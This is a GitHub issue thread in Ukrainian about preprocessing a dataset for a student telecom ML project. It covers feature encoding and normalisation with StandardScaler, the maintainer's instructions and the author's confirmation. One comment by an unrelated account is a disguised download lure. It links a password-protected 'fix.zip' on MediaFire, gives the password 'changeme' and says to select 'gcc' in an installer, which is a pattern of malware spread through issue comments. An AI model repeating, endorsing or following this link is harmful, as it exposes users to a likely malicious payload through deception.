### ISSUE TITLE
[PPD] Попередня обробка даних

### ISSUE THREAD

**Issue by AlinaVoitenko89** [carerakjan/goit-telecom-project-group-1#4]
**Опис:**
Фінальна підготовка датасету до навчання

**Зробити:**
* Кодування категоріальних змінних: One-Hot Encoding або Label Encoding.
* Нормалізація ознак: Стандартизація.

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by carerakjan** [comment]
в тебе була застара бранча, я забрав зміни з мастера, треба зробити наступне
* перенеси пліз свій ноутбук у теку `project/notebooks`
* згенеруй новий датасет в теку  `project/data`

**Comment by carerakjan** [comment]
використай `StandardScaler` оскільки в нас не має категоріальних і лейблед даних (опис таски не дуже валідний). Дяк

**Comment by AlinaVoitenko89** [comment]
-  Свій ноутбук перенесла, новий датасет згенерувала
- Код оновила, лишила лише нормалізацію
